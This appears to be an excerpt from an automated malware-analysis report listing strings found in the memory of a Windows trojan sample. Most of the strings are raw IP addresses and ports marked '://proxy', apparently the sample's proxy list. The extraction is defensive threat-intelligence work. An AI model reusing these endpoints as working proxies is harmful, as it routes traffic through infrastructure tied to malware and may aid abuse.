                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.211:55562
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.211:55562://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9557000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.49:46898
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.49:46898://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.60:56462
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.60:56462://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.90.121.79:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.90.121.79:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.92.204.54
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.92.204.54://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.92.204.54:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.133.123.122:3218
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.133.123.122:3218://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.135.234.101:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.135.234.101:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:50573
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:50573://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:57607
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:57607://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:59058
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:59058://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C758D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:28513
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C758D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:28513://proxyp
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:40927
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:40927://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:5189
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:5189://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0A7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB11A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:64556
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:64556://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.84.202:1240
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.84.202:1240://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.145.137.102:37447
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.145.137.102:37447://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.147.192.100:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.147.192.100:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.182.98:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.182.98:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.151.79.84:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.151.79.84:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.157.6.50
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.157.6.50://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.157.6.50:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.56.132:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.56.132:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.182:35559
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.182:35559://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.165.168.190:9898
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.165.168.190:9898://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.165.168.190:9898x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.166.82.158:62715
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.166.82.158:62715://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.166.82.158:62715HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.168.210.76
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.168.210.76://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.168.210.76:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.170.117.150:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.170.117.150:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.171.214.19:8001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.171.214.19:8001://proxyxD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.171.44.86:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.171.44.86:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.179.245.72:4444
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.179.245.72:4444://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.184.153.66:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.184.153.66:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C806C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.190.26.158:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.190.26.158:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.197.136.218:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.197.136.218:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.210.67.186:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.210.67.186:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.11.149:41878
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.11.149:41878://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.230.107.235:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.230.107.235:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.178.137:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.178.137:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.244.79.227:39811
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.244.79.227:39811://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.32.66.64:56637
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.32.66.64:56637://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.32.91.205:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.32.91.205:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.2.27
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.2.27://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.2.27:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.2.28
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.2.28://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.5.197.61:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.5.197.61:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.155.9:19000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.155.9:19000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.170.17
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.170.17://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.170.17:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.7.196.26:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.7.196.26:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCA0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.91.232.94:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.91.232.94:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:3409
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:3409://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:40571
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:40571://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:9735
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:9735://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.107.129.67:10180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.107.129.67:10180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.218.240.46:48324
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.218.240.46:48324://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.236.197.38:8031
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.236.197.38:8031://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.80.120.100:3820
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.80.120.100:3820://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.100.18.204:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.100.18.204:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.112.80.252
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.112.80.252://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.112.80.252:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.115.115.253:56792://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.115.115.253:56792HJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.12.201.56:11337
